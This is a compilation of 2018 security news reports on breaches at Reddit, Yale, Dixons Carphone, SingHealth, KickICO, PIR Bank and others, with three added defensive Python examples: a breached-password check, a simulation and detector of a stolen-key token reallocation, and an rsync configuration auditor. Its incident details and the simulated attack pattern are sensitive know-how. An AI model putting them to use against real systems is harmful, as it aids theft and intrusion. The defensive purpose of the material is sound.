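As an added example (not GitHub's or Troy Hunt's code) of the check described in this article and in the securityaffairs piece above: a candidate password is hashed with SHA-1 and looked up in a local breached-password index at the moment the user presents it, bucketed by the same five-character hash prefix the public range API uses, while the stored credential remains a bcrypt hash. The "SHA1HEX:COUNT" line layout, the sample passwords and their counts are assumptions constructed for the example.

```python
"""Check a password, at the moment the user presents it, against a local copy
of a breached-password dataset, and decide whether to accept it.

Added example; not GitHub's or Troy Hunt's code. Assumptions: the dataset
uses one "SHA1HEX:COUNT" line per password (the Pwned Passwords text
layout); the sample dataset below is constructed here from a few widely
known weak passwords so the script runs offline.
"""
import hashlib
from collections import defaultdict

PREFIX_LEN = 5  # k-anonymity prefix: the first 5 hex characters of the SHA-1


def sha1_hex(password: str) -> str:
    """Upper-case SHA-1 hex digest, the key the dataset is indexed by."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


class BreachPasswordIndex:
    """In-memory index of a breached-password file, bucketed by hash prefix.

    Bucketing by prefix mirrors the public range API: a caller asks for one
    bucket and compares the remaining 35 hex characters locally, so the full
    hash (let alone the password) never has to leave the caller.
    """

    def __init__(self, lines):
        self._buckets = defaultdict(dict)
        for raw in lines:
            line = raw.strip()
            if not line:
                continue
            digest, _, count = line.partition(":")
            digest = digest.upper()
            if len(digest) != 40:
                raise ValueError(f"malformed dataset line: {raw!r}")
            self._buckets[digest[:PREFIX_LEN]][digest[PREFIX_LEN:]] = int(count or 0)

    def range_query(self, prefix: str) -> dict:
        """All (suffix -> count) entries that share a 5-character prefix."""
        return dict(self._buckets.get(prefix.upper(), {}))

    def breach_count(self, password: str) -> int:
        """How many times the password appears in the breach data; 0 if never."""
        digest = sha1_hex(password)
        return self.range_query(digest[:PREFIX_LEN]).get(digest[PREFIX_LEN:], 0)


def evaluate_password(index: BreachPasswordIndex, password: str) -> tuple:
    """Decision for login, registration or a password change: (accepted, hits).

    The comparison needs the cleartext, so it can only run while the user is
    presenting the password; what is stored stays a bcrypt hash, and stored
    bcrypt hashes cannot be checked against a SHA-1 list afterwards. A
    rejected password should trigger a change prompt rather than a silent
    failure.
    """
    hits = index.breach_count(password)
    return (hits == 0, hits)


# Constructed sample dataset (cleartexts are used here only to build the
# lines; a real file holds hashes and counts, never cleartexts).
_SAMPLE_LEAKED = {"password": 3730471, "123456": 23174662, "qwerty": 3946737, "letmein": 213763}
SAMPLE_LINES = [f"{sha1_hex(p)}:{n}" for p, n in _SAMPLE_LEAKED.items()]

if __name__ == "__main__":
    index = BreachPasswordIndex(SAMPLE_LINES)
    for candidate in ("password", "a-long-unique-passphrase-9f2k"):
        print(candidate, "->", evaluate_password(index, candidate))
```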

Users who have two-factor authentication (2FA) enabled will receive periodic warnings to review the 2FA setup and recovery options, GitHub also reveals.

However, traditional 2FA options such as SMS have proven to be unreliable, and all of the online platform’s users are advised to use a 2FA authenticator application that supports cloud backups, to ensure a recovery option is always available for them.

“These new account security enhancements will help improve the security of your account. We hope you will take this opportunity to review the security of your account. Balancing security, usability, and recoverability is a personal decision,” GitHub notes.

The service’s users are advised to generate strong, unique passwords using a dedicated manager, to enable 2FA, and to make sure an account-recovery method is available. They should also update their primary email address if necessary and review their other credentials on the platform, GitHub says.

GitHub, which will soon become part of Microsoft, has made other security improvements as well, including the enforcing of SSL/TLS. This, however, did not stop hackers from compromising accounts to spread malicious code, as was the case with the recent Gentoo incident.


Global Shipping Firm Clarksons Provides Update on 2017 Breach
3.8.18 securityweek  Incindent

Clarkson PLC (Clarksons), a global shipping services firm, this week provided an update to the breach it suffered between May and November 2017. Little further on the nature of the breach is revealed, other than the extent of the customer personal information that was stolen.

In November 2017, Clarksons revealed that a single compromised user account had allowed attackers to infiltrate their systems, exfiltrate personal data, and demand a ransom for its safe return. Clarksons declined to pay the ransom, and for some time it was expected that the data might be revealed. "I hope our clients understand that we would not be held to ransom by criminals, and I would like to sincerely apologise for any concern this incident may have understandably raised," said Andi Case, CEO of Clarksons.

In its latest statement (PDF) the firm claims it was able -- with the help of law enforcement and forensic specialists -- to successfully trace and recover the stolen data. It doesn't state -- and probably could not know -- whether the stolen data had been copied before it was recovered. It is nevertheless warning those potentially affected by the incident to, "Remain vigilant against incidents of identity theft and fraud by reviewing personal account statements for suspicious activity and to detect errors."

What is most surprising in this updated information is the extent of personal information that was stored by the company and stolen by the criminals. In full, the statement says,

"While the potentially affected personal information varies by individual, this data may include a date of birth, contact information, criminal conviction information, ethnicity, medical information, religion, login information, signature, tax information, insurance information, informal reference, national insurance number, passport information, social security number, visa/travel information, CV / resume, driver's license/vehicle identification information, seafarer information, bank account information, payment card information, financial information, address information and/or information concerning minors."

There is no mention of whether any of this data was encrypted or hashed. Identity theft, bank fraud and blackmail are the most obvious threats if such data were in the wrong hands.

"In this particular incident, what is honestly shocking is the amount of sensitive data that this single account had access to and I am sure the EU GDPR will be looking closely," comments Joseph Carson, chief security scientist at Thycotic. "If it is found that EU GDPR applies, and Clarkson PLC had failed to apply adequate security, they could be facing a huge financial penalty." Whether GDPR can be invoked will be up to the individual EU regulators. Clarksons claims the intruder had access to its systems from May 31, 2017 until November 4, 2017, which is before GDPR became active on May 25, 2018.

Rishi Bhargava, co-founder at Demisto, told SecurityWeek that Clarksons appears to have gone through the mechanics of breach notification conscientiously. "Clarksons seems to have provided updates and apprised affected individuals in a comprehensive and transparent manner," he said. "There are numerous cross-industry regulations to deal with while implementing breach notifications, and the granularity of US state-specific information shared by Clarksons is testament to that."

But he added, "The bigger question to consider is whether Clarksons needed to retain all this personal information in the first place. With GDPR introducing strict regulations for data processing, data consent, explicit need for processing, retention timelines, and deletion, organizations need to rethink their entire ‘data supply chain' if they haven't already. However transparent breach notifications are, they're still a post-breach exercise and need to be matched by operational data discipline in order to truly bring accountability to data processors."

It is possible that the tracing and recovery of the stolen data also implies knowledge of the perpetrator -- he or she may even be in custody. If this is true, it will probably be only through subsequent court documents that we discover exactly how the breach occurred. However, most security experts believe our knowledge so far points to a failure to use multi-factor authentication, and a failure to adequately manage privileged accounts.

Timur Kovalev, CTO at Untangle, told SecurityWeek, "While unfortunate, these sorts of breaches are certainly not uncommon. However, there are steps that organizations can take to mitigate their risk. Requiring multi-factor authentication for user accounts is a rational first step. Additionally, IT departments need to limit access of even properly credentialed users to only those apps and systems that are critical for that person's business use. Finally, companies can reduce the amount of customer data they are storing anywhere on networked systems; GDPR will certainly help accelerate this best practice."

Carson agrees. "The lesson to be learned from this incident is the importance in protecting accounts with privileged access to sensitive data and that those accounts should never use a password as the only security control. Similarly, a single account should never have full access to such a large amount of data -- at least without peer reviews and approval processes."

The question of whether Clarksons had a valid reason to store that amount of highly sensitive personal data remains one for the regulators.


Dixons Carphone Breach: Much Larger Than First Thought
2.8.18 securityweek Incindent

A data breach at Dixons Carphone that was made public last month resulted in 10 million records being accessed by unknown actors, the UK consumer electronics retailer announced Tuesday.

The company initially said that only 1.2 million records containing personal data of its customers, such as name, address or email address, were accessed during the intrusion. They also claimed that the accessed data did not include financial information.

In an update released this week (PDF), the company revealed that hackers were able to access approximately 10 million records containing personal data. The incident happened last year, but no specific details on when or how the intrusion took place were provided.

Although it initially said that the attackers were attempting to access 5.9 million cards and that 105,000 non-EU issued payment cards were indeed compromised, the company now says that the impacted records did not contain payment card details.

“While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and there is no evidence that any fraud has resulted. We are continuing to keep the relevant authorities updated,” Dixons Carphone said.

The company also announced that it has decided to inform all of its customers of the data breach. The retailer says this is only a precaution: it is apologizing to customers and advising them of protective steps they can take to minimize the risk of fraud.

“As we indicated previously, we have taken action to close off this access and have no evidence it is continuing,” the company said.


Yale University Discloses Decade-Old Data Breach
2.8.18 securityweek Incindent

"Because the intrusion happened nearly ten years ago, we do not have much more information about how it occurred."

Yale University revealed that hackers accessed one of its databases between 2008 and 2009 and accessed the personal information of 119,000 people.

The intrusion happened between April 2008 and January 2009 and apparently affected a single database stored on a Yale server. The data breach was discovered on June 16, 2018, during a security review. The attackers extracted names, Social Security numbers, and, in almost all cases, dates of birth. In many cases, Yale email addresses were also extracted, and in some cases the physical addresses of individuals associated with the university were compromised as well.

According to Yale, no financial information was stored in the database and almost all people impacted by the breach were affiliated with the university.

“In 2011, Yale IT deleted the personal information in the database as part of an effort to eliminate unneeded personal information on Yale servers, but the intrusion was not detected at that time,” the university says.

Last week, Yale sent notices of the data breach to impacted members of the Yale community, including alumni/ae, faculty members, and staff members. The university says notices were sent to nearly 97% of the individuals affected, but that it has yet to acquire a verified current address for the remaining 3%.

In a letter (PDF) to the State of New Hampshire Attorney General, Yale also revealed that the same server was hacked a second time between March 2016 and June 2018. The intrusion resulted in the compromise of the names and Social Security numbers of 33 individuals, none of whom reside in New Hampshire.

Yale claims that there is no indication that the compromised information has been misused. However, it decided to offer identity monitoring services at no cost, to help users guard against identity theft.

Because the intrusion occurred a decade ago, there is no information on how the attackers hacked the server. Yale also says that “it is not feasible to determine the identities of the perpetrators.”


Ten years ago someone breached into a server of the Yale University
2.8.18 securityweek Incindent

Ten years ago someone breached a server of Yale University, but because the intrusion happened nearly ten years ago there is not much information about how it occurred.
After ten years, Yale University revealed a security breach that exposed an archive containing personal information of 119,000 people.

Hackers breached the database of the famous university between April 2008 and January 2009, apparently accessing a server hosting a single database.

“On July 26th and 27th, Yale mailed notices to members of the Yale community, including alumni/ae, faculty members, and staff members, who were affected by a data intrusion that occurred in 2008-2009.” reads the security alert published by the Yale University.


The database contained data of individuals affiliated with the university; the unauthorized access was discovered on June 16, 2018, during a security review.

The hackers accessed names, Social Security numbers, dates of birth, Yale email addresses, and in some cases the physical addresses of individuals associated with the university.

Unfortunately, there is no way to determine how the attackers hacked the server, and Yale says “it is not feasible to determine the identities of the perpetrators.”

The academic institution announced that no financial information was exposed; it sent notice letters to 97% of the affected people in the Yale community.

Unfortunately, there is more disconcerting news for the Yale community: a letter sent by the university to the State of New Hampshire Attorney General revealed that the same server was hacked a second time between March 2016 and June 2018.

This second intrusion caused the exposure of the names and Social Security numbers of 33 individuals, none of whom reside in New Hampshire.

Yale is offering identity monitoring services to all affected U.S. residents through the Kroll security firm. At this time there is no indication that the exposed data has been misused.


Reddit discloses a data breach, a hacker accessed user data
2.8.18 securityweek Incindent

Reddit is warning its users of a security breach, an attacker broke into the systems of the platform and accessed user data.
Reddit is warning its users of a security breach, a hacker broke into the systems of the platform and accessed user data.

The hacker accessed user data, email addresses, and a 2007 backup database containing hashed passwords managed by the platform.

The data breach was discovered on June 19, 2018; according to Reddit, between June 14 and 18, 2018, the attacker compromised some employee accounts with the company’s cloud and source code hosting providers.

“A hacker broke into a few of Reddit’s systems and managed to access some user data, including some current email addresses and a 2007 database backup containing old salted and hashed passwords. Since then we’ve been conducting a painstaking investigation to figure out just what was accessed, and to improve our systems and processes to prevent this from happening again.” reads a data breach notification published by the company.

Reddit users who are still using the same password they had in 2007 must change it now, along with the password of any other service where they use the same login credentials.

The hacker did not gain write access to Reddit systems containing backup data, source code, and other logs.

The company explained that the accounts were protected with SMS-based two-factor authentication, which suggests the attackers were able to intercept the authentication codes sent via SMS.

“Already having our primary access points for code and infrastructure behind strong authentication requiring two factor authentication (2FA), we learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept. We point this out to encourage everyone here to move to token-based 2FA.” continues Reddit.


The company has taken steps to lock down and rotate all production secrets and API keys, and to enhance its monitoring systems.

Reddit has already reported the security breach to law enforcement and is notifying affected users, urging them to change their passwords.

Let me close with this Q&A published by Reddit:

What information was involved?

Since June 19, we’ve been working with cloud and source code hosting providers to get the best possible understanding of what data the attacker accessed. We want you to know about two key areas of user data that was accessed:

All Reddit data from 2007 and before including account credentials and email addresses
What was accessed: A complete copy of an old database backup containing very early Reddit user data — from the site’s launch in 2005 through May 2007. In Reddit’s first years it had many fewer features, so the most significant data contained in this backup are account credentials (username + salted hashed passwords), email addresses, and all content (mostly public, but also private messages) from way back then.
How to tell if your information was included: We are sending a message to affected users and resetting passwords on accounts where the credentials might still be valid. If you signed up for Reddit after 2007, you’re clear here. Check your PMs and/or email inbox: we will be notifying you soon if you’ve been affected.
Email digests sent by Reddit in June 2018
What was accessed: Logs containing the email digests we sent between June 3 and June 17, 2018. The logs contain the digest emails themselves — they look like this. The digests connect a username to the associated email address and contain suggested posts from select popular and safe-for-work subreddits you subscribe to.
How to tell if your information was included: If you don’t have an email address associated with your account or your “email digests” user preference was unchecked during that period, you’re not affected. Otherwise, search your email inbox for emails from [noreply@redditmail.com](mailto:noreply@redditmail.com) between June 3-17, 2018.


Medical System Notifies 1.4M Patients About Computer Breach
1.8.18 securityweek   Incindent

A major Iowa hospital and medical clinic system has notified about 1.4 million patients and former patients about a computer breach that might have exposed their personal information.

UnityPoint Health officials say hackers broke into the company's email system and could have obtained medical information.

UnityPoint's privacy officer, RaeAnn Isaacson, said Monday the company isn't aware of any misuse of patient information related to the incident. But she says the company is telling patients what UnityPoint is doing to address the situation and what patients can do to help protect their information.

The company says the hackers also might have obtained some patients' financial information.

UnityPoint says that after the problem was discovered May 31, it hired outside experts and notified the FBI.


Dixons Carphone Data Breach discovered in June affected 10 Million customers
1.8.18 securityaffairs  Incindent

Dixons Carphone announced on Monday that the security breach discovered in June affected around 10 million customers, much more than the initial estimate.
Dixons Carphone, one of the largest European consumer electronics and telecommunication retailers, suffered a major data breach in 2017, and new details about the incident have now been shared.

The situation was worse than initially thought: the company announced on Monday that the security breach affected around 10 million customers, far more than the initial estimate.

“Our investigation, which is now nearing completion, has identified that approximately 10 million records containing personal data may have been accessed in 2017.” reads a statement published by the company.

“While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and there is no evidence that any fraud has resulted. We are continuing to keep the relevant authorities updated.”

Dixons Carphone discovered in June 2017 an “unauthorised access” to certain data held by the company; it promptly launched an investigation and hired an external firm to shed light on the case.

The company immediately reported the hack to law enforcement, regulators at the Information Commissioner’s Office and the Financial Conduct Authority.

Hackers may have accessed personal information of the affected customers including their names, addresses and email addresses last year.
In June it was estimated that hackers had accessed data of 1.2 million people and that 5.9 million payment cards used at Currys PC World and Dixons Travel were exposed.

Dixons Carphone assured its customers that no financial data (PIN codes, card verification values and authentication data) was exposed.

“As a precaution, we are choosing to communicate to all of our customers to apologize and advise them of protective steps to minimize the risk of fraud,” continues the statement. “We are continuing to keep the relevant authorities updated.”


The company announced further security measures to protect its systems and confirmed that all necessary action to lock out the attackers has been taken.
“We continue to make improvements and investments at pace to our security environment through enhanced controls, monitoring, and testing,” Dixons said.

This isn’t the first time the company has suffered a security breach: in 2015 another incident exposed the credit card details of 90,000 Dixons Carphone customers.

Affected customers are nonetheless potentially exposed to phishing attacks and should remain vigilant.


KICKICO security breach – hackers stole over $7.7 million worth of KICK tokens
30.7.18 securityaffairs Incindent

ICO platforms are becoming a privileged target for hackers; the latest victim is KickICO, a blockchain crowdfunding website for ICOs.
On Friday, KickICO disclosed a security breach: according to the platform, attackers accessed its wallets and stole over 70 million KICK tokens (roughly $7.7 million at the time).

The incident occurred on July 26 at 09:04 UTC. KickICO CEO Anti Danilevski explained that staff learned of the security breach from the complaints of victims.


“On July 26 at 9:04 (UTC) KICKICO has experienced a security breach, which resulted in the attackers gaining access to the account of the KICK smart contract — tokens of the KICKICO platform. The team learned about this incident after the complaints of several victims, who did not find tokens worth 800 thousand dollars in their wallets.” reads the data breach notification published by the company.

As of Friday, the company announced the situation was under control and the smart contract had been restored. KickICO announced it will return all stolen KICK tokens to their legitimate owners and invited them to get in touch by email at report@kickico.com.

“KICKICO guarantees to return all tokens to KickCoin holders. We apologize for the inconveniences,” Danilevski said.

The company quickly started an investigation into the security breach; the internal staff discovered that the attackers had gained access to the private key of the KickICO platform used by the developers to manage the KICK token smart contract.

Once they had obtained the key, the attackers used it to destroy KICK tokens at approximately 40 addresses and to create the same amount of tokens at 40 other wallets under their control. Because of this trick the overall number of tokens did not change, so the security measures in place were unable to detect the fraudulent activity.

“The hackers gained access to the private key of the owner of the KickCoin smart contract. In order to hide the results of their activities, they employed methods used by the KickCoin smart contract in integration with the Bancor network: hackers destroyed tokens at approximately 40 addresses and created tokens at the other 40 addresses in the corresponding amount. In result, the total number of tokens in the network has not changed. ” continues the notification.
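To see why a check on the total supply alone misses this pattern, here is an added Python simulation (not KICKICO's contract or its Bancor integration): an owner-controlled token ledger, the naive supply invariant, and a detector that correlates owner-signed burns with equal mints to a disjoint set of addresses in the same block window. All addresses, amounts, block numbers and the window size are constructed.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    kind: str      # "burn" or "mint"
    address: str   # holder whose balance changed
    amount: int
    block: int
    signer: str    # key that signed the transaction


class OwnerToken:
    """Minimal token whose owner key may burn and mint any holder's balance."""

    def __init__(self, owner, balances):
        self.owner = owner
        self.balances = dict(balances)
        self.events = []

    def total_supply(self):
        return sum(self.balances.values())

    def _owner_op(self, kind, signer, address, amount, block):
        # The only guard is the owner signature: once that key is stolen,
        # every call below is indistinguishable from a legitimate one on-chain.
        if signer != self.owner:
            raise PermissionError("only the owner key may burn or mint")
        if kind == "burn":
            if self.balances.get(address, 0) < amount:
                raise ValueError("insufficient balance to burn")
            self.balances[address] -= amount
        else:
            self.balances[address] = self.balances.get(address, 0) + amount
        self.events.append(Event(kind, address, amount, block, signer))

    def burn(self, signer, address, amount, block):
        self._owner_op("burn", signer, address, amount, block)

    def mint(self, signer, address, amount, block):
        self._owner_op("mint", signer, address, amount, block)


def supply_unchanged(before, token):
    """The naive invariant: total supply now equals total supply before."""
    return token.total_supply() == before


def detect_reallocation(events, window=10, min_victims=5):
    """Flag block windows in which owner-signed burns across many holders are
    exactly offset by mints to addresses that were not burned."""
    buckets = defaultdict(list)
    for ev in events:
        buckets[ev.block // window].append(ev)
    alerts = []
    for bucket, evs in sorted(buckets.items()):
        burns = [e for e in evs if e.kind == "burn"]
        mints = [e for e in evs if e.kind == "mint"]
        victims = {e.address for e in burns}
        receivers = {e.address for e in mints}
        burned = sum(e.amount for e in burns)
        minted = sum(e.amount for e in mints)
        if (burns and mints and burned == minted
                and len(victims) >= min_victims
                and victims.isdisjoint(receivers)):
            alerts.append({"window": bucket, "amount": burned,
                           "victims": sorted(victims),
                           "receivers": sorted(receivers)})
    return alerts


def simulate_incident():
    """Constructed replay of the pattern above: 40 holders burned and 40
    attacker addresses minted the same amounts, spread over a few blocks."""
    owner = "owner-key"
    holders = {"holder%02d" % i: 1_000_000 for i in range(40)}
    token = OwnerToken(owner, holders)
    before = token.total_supply()
    for i, victim in enumerate(holders):
        block = 100 + i // 8            # eight burn/mint pairs per block
        token.burn(owner, victim, 1_000_000, block)
        token.mint(owner, "attacker%02d" % i, 1_000_000, block)
    return before, token


def simulate_benign():
    """A single owner-signed burn (e.g. a redemption) with no matching mint."""
    token = OwnerToken("owner-key", {"holderA": 500, "holderB": 700})
    token.burn("owner-key", "holderA", 200, block=50)
    return token
```

In the incident replay `supply_unchanged` still returns True while `detect_reallocation` raises one alert naming all 40 drained holders; the benign redemption raises none.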

Fortunately, the community quickly discovered the security breach and helped the platform to mitigate it. KICKICO quickly responded and prevented further losses by replacing the compromised private key with another one associated with the cold storage.

Read more: https://cryptovest.com/news/kickico-suffered-77m-hack-attack-says-will-return-stolen-kicko-tokens/

“After the incident, the KICK token, listed on the 136th position on Coinmarketcap, has lost 1.87% in the last 24 hours. However, the move may be influenced by the bearish mood of the entire crypto market after the SEC rejected a Bitcoin ETF proposed by the Winklevoss twins.” reported the website cryptovest.com.


Massive Singapore Healthcare Breach Possibly Involved Contractor
30.7.18 securityweek Incindent

Researchers have come across two Pastebin posts that could shed more light on the data breach that resulted in the health records of 1.5 million Singaporeans getting stolen by hackers.

Authorities in Singapore announced on July 20 that a sophisticated threat actor had gained unauthorized access to a database of SingHealth, the city-state’s largest group of healthcare institutions.

The incident, described as Singapore’s biggest ever data breach, resulted in personal information and details on medication becoming compromised, but authorities said medical records, clinical notes and financial information were not affected.

The attackers are said to have used a malware-infected computer to access a SingHealth database between June 27 and July 4.

Singapore officials suggested – and independent cybersecurity experts confirmed – that the attack was likely carried out by a state-sponsored threat group, but they have refrained from publicly speculating on who might be behind the operation.

Trustwave has been monitoring the incident and the security firm is also convinced that the attack was launched by a nation-state actor.

“At this point, Trustwave SpiderLabs is not assigning attribution to a specific threat actor. We have strong suspicion but do not feel we have enough information to confirm attribution,” the company said.

Over the weekend, Trustwave published a blog post detailing its analysis of two files published by unknown individuals on code and text storage website Pastebin. While they have not been able to confirm it, researchers believe these files are somehow linked to the SingHealth breach and noted that they could provide important clues about how the attackers gained access to the data.

One of the files, an exception log from a Java server, posted to Pastebin on May 24, shows a query for delegating access to a SingHealth Headquarters (SHHQ) database from a senior manager in the Medical Technology Office of Singapore’s Health Services to an employee of CTC, a major IT contractor.

The delegation request was set for June 9 - 17 and it could mean that the attacker had hijacked the contractor’s user account and leveraged it to manipulate the SingHealth database. These dates show that the hackers may have conducted at least some reconnaissance activities weeks earlier than what Singapore officials reported.

The log file also shows that the target was a database named portaldev. “It is conceivable that the development environment server was not as well protected as the production server and therefore was an easier target,” Trustwave researchers said.

The security firm also discovered a series of SQL queries, targeting SingHealth medical data, uploaded to Pastebin on June 15. These queries suggest that whoever executed them was looking for sensitive information.

While it’s possible that the files were uploaded to Pastebin by developers working on the SingHealth database, they may have also been posted by the attacker, possibly to share code with collaborators for troubleshooting purposes, Trustwave explained.

“While we cannot know for certain if these findings are directly related to the SingHealth compromise, the combination of suspicious items occurring directly within the attack window are highly suspicious,” researchers said.


Data Leak at Robotics Firm Exposes Global Manufacturers
24.7.18 securityweek Incindent

A publicly accessible server belonging to robotics vendor Level One Robotics and Controls, Inc. contained sensitive documents connected to more than one hundred manufacturing companies.

Established in 2000, the engineering service provider offers automation process and assembly for OEMs, Tier 1 automotive suppliers, and end users, delivering services such as project management, design, integration, debug, and training.

The exposed server was discovered by the UpGuard Cyber Risk team earlier this month. It contained 157 gigabytes of data, including documents, schematics, and other information belonging to the provider’s customers and employees.

The exposed data included “over 10 years of assembly line schematics, factory floor plans and layouts, robotic configurations and documentation, ID badge request forms, VPN access request forms, and ironically, non-disclosure agreements,” the security firm reveals.

Specifications and use of the machines, as well as animations of the robots at work, customer contact details, and ID badge request forms were also found on the server.

Level One customers impacted by the data exposure include divisions of VW, Chrysler, Ford, Toyota, GM, Tesla and ThyssenKrupp.

The server also contained data belonging to the organization’s employees, such as scans of driver’s licenses, passports and other identification. Level One business data was also exposed, including invoices, prices, contracts, typical business documents, and bank account details (including account and routing numbers, and SWIFT codes).

“The sheer amount of sensitive data and the number of affected businesses illustrate how third and fourth-party supply chain cyber risk can affect even the largest companies,” the security firm notes.

UpGuard says the data was exposed via rsync, the file transfer protocol commonly used for large data transfers. The researchers discovered that access to the server wasn’t restricted by IP or user and that the data was downloadable to any rsync client that connected to the rsync port.
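The two missing controls UpGuard names, no source-address restriction and no user authentication, are both rsyncd.conf module parameters. As an added example (not Level One's configuration or UpGuard's tooling), this Python audit parses an rsyncd.conf, applies the daemon's defaults (modules are listed and read-only unless told otherwise, and with neither "hosts allow" nor "auth users" they are readable by any client), and reports modules that are exposed the way the server above was. The module name, path and address range are constructed.

```python
import re

# rsyncd.conf parameters that govern who may read a module. A module with
# neither "hosts allow" nor "auth users" serves any client that connects.


def parse_rsyncd_conf(text):
    """Parse rsyncd.conf text into (global_params, {module: params}).
    Keys are lower-cased; '#' and ';' lines are comments; '&include'/'&merge'
    directives are skipped (this parser does not read other files)."""
    global_params, modules = {}, {}
    current = global_params
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;&":
            continue
        section = re.match(r"^\[(.+)\]$", line)
        if section:
            current = modules.setdefault(section.group(1).strip(), {})
            continue
        if "=" not in line:
            continue                      # tolerate stray text
        key, value = line.split("=", 1)
        current[key.strip().lower()] = value.strip()
    return global_params, modules


def _is_true(value, default):
    """rsync boolean parameters accept yes/true/1 and no/false/0."""
    if value is None:
        return default
    return value.lower() in ("yes", "true", "1")


def audit_rsyncd_conf(text):
    """Return {module: [issues]} for every module that is reachable anonymously,
    from any address, advertised in listings, or writable."""
    global_params, modules = parse_rsyncd_conf(text)
    findings = {}
    for name, params in modules.items():
        eff = {**global_params, **params}    # module values override globals
        issues = []
        if "hosts allow" not in eff:
            issues.append("no 'hosts allow': any source address may connect")
        if "auth users" not in eff:
            issues.append("no 'auth users': unauthenticated clients are served")
        elif "secrets file" not in eff:
            issues.append("'auth users' set but no 'secrets file'")
        if _is_true(eff.get("list"), True):
            issues.append("module is advertised to anonymous listing (list = yes)")
        if not _is_true(eff.get("read only"), True):
            issues.append("module is writable (read only = no)")
        if issues:
            findings[name] = issues
    return findings


# Constructed configurations; the module, path and network are made up.
WEAK_CONF = """
uid = nobody
use chroot = yes

[engineering]
    path = /srv/engineering
    comment = customer schematics and badge forms
"""

HARDENED_CONF = """
uid = nobody
use chroot = yes
list = no

[engineering]
    path = /srv/engineering
    comment = customer schematics and badge forms
    read only = yes
    hosts allow = 10.20.0.0/16
    auth users = sync-user
    secrets file = /etc/rsyncd.secrets
"""
```

The weak module yields three findings (no address restriction, no authentication, listed anonymously); the hardened one yields none. Restricting the rsync port at the network edge is still a separate control this file cannot express.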

“This is the same type of administrative error we continue to see over and over again both on-premise as well as in the cloud. Until organizations wholly operationalize security into their development lifecycle, we will likely continue to see similar data exposure from non-malicious insiders,” Matt Chiodi, VP of Cloud Security at RedLock, told SecurityWeek in an emailed commentary.

Discovered on July 1, 18, the exposed rsync server was established to belong to Level One several days later. The company was successfully informed of the issue on July 9 and closed the exposure by the next day.

“The fact that this kind of breach happened and data from so many big players was involved goes to show that anyone can be a victim if third parties are not continuously vetted. It is no longer enough for companies to maintain trust through a one-time or annual audit. Big players should demand a transparent and ongoing demonstration of security controls in action,” James Lerud, head of the Behavioral Research Team at Verodin, said in an emailed commentary.


"MoneyTaker" Hackers Stole $1 Million From Russian Bank
22.7.18 securityweek Incindent

A cybercriminal group referred to as MoneyTaker recently managed to steal nearly $1 million from PIR Bank (Russia), according to cybercrime research firm Group-IB.

The theft was performed on July 3 through the Russian Central Bank’s Automated Workstation Client, an interbank system similar to SWIFT. The hackers managed to transfer the funds to 17 accounts at major Russian banks and then cashed them out.

After the incident, the cybercriminals also attempted to maintain persistence in the bank’s network, but were detected. While PIR staff was able to delay the withdrawal of some of the funds, it appears that most of what was stolen has been lost, namely around $920,000 (which is a conservative estimate, according to Group-IB).

Group-IB, which analyzed the incident, says that all evidence points to the MoneyTaker group orchestrating the theft. The investigators discovered tools and techniques previously associated with the group, along with the IP addresses of their command and control (C&C) servers.

The security firm previously reported that MoneyTaker had launched over 20 successful attacks against financial institutions and legal firms in the US, UK and Russia over the past two years. The group has been mainly focused on card processing systems, such as the AWS CBR (Russian Interbank System) and SWIFT (US).

The security researchers established that the attack on PIR Bank started in late May 18 and that a compromised router at one of the bank’s regional branches was used as the entry point.

“The router had tunnels that allowed the attackers to gain direct access to the bank’s local network. This technique is a characteristic of MoneyTaker. This scheme has already been used by this group at least three times while attacking banks with regional branch networks,” the researchers say.

The hackers breached the bank’s main network and accessed the AWS CBR, then generated payment orders and sent money to mule accounts prepared in advance. Funds were transferred to accounts at 17 of the largest banks and were immediately cashed out by money mules via ATMs.

The bank employees discovered the unauthorized transactions with large sums on the evening of July 4 and asked the regulator to block the AWS CBR digital signature keys, but weren’t able to stop the financial transfers in time. Thus, the hackers managed to cash out most of the stolen money.

The attackers also cleared OS logs on compromised computers to hinder analysis. They also left reverse shells on the bank’s computers to conduct new attacks, but these were discovered during the investigation and removed.

Attacks on AWS CBR are not easy to implement, Valeriy Baulin, Head of Digital Forensics Lab Group-IB, says. Thus, such attacks are “not conducted very often, because many hackers just cannot ‘work on computers with AWS CBR’ successfully.”

“This is not the first successful attack on a Russian bank with money withdrawal since early 18. We know of at least three similar incidents. A 2016 incident, when МoneyTaker hackers withdrew about $2 million using their own self-titled program, remains one of the largest attacks of this kind,” Baulin said.


HR Services Firm ComplyRight Suffers Data Breach
22.7.18 securityweek Incindent

Florida-based HR services provider ComplyRight revealed recently that its tax reporting platform was involved in a cybersecurity incident that resulted in the exposure of personal information.

ComplyRight learned on May 22 that someone had gained unauthorized access to its web-based tax reporting platform, which is used by various websites to prepare W-2, 1099 and other tax-related forms.

ComplyRight, which is owned by marketing company Taylor Corporation, provides tax solutions through efile4Biz. The efile4Biz website claims its services are used by 76,000 organizations.

However, ComplyRight says the data breach has impacted fewer than 10 percent of the individuals whose tax forms have been prepared on its platform.

An investigation conducted by the company showed that the attacker gained access to the names, addresses, phone numbers, email addresses, and Social Security numbers of individual tax form recipients. However, ComplyRight has not been able to determine whether the compromised information was actually downloaded by the unauthorized party, and says it has not seen any evidence of fraud as a direct result of the incident.

Affected individuals are being notified by mail and offered 12 months of free credit monitoring and identity theft protection services.

Security blogger Brian Krebs reported that some of the recipients of these letters were unaware of ComplyRight. The company clarified that its platform is used by various tax form preparation websites whose customers are impacted by the breach and many may not be familiar with the ComplyRight brand.

According to Krebs, the attackers had access to ComplyRight systems between April 20, 18 and May 22, 18.

“Upon learning of the issue, we disabled the platform, remediated the issue on the website, and commenced a prompt and thorough investigation using external cybersecurity professionals to determine who was potentially affected and what information was accessed or viewed,” ComplyRight stated. “Although the investigation determined the information was accessed and/or viewed, it could not confirm if the information was downloaded or otherwise acquired by an unauthorized user.”

ComplyRight is not the only HR services firm hit by a data breach recently. Australia-based PageUp reported last month that hackers may have gained access to names, contact information, usernames, and password hashes. PageUp says it has 2.6 million active users across over 190 countries.


Singapore Says Hackers Stole 1.5 Million Health Records in Massive Cyberattack
22.7.18 securityweek Incindent

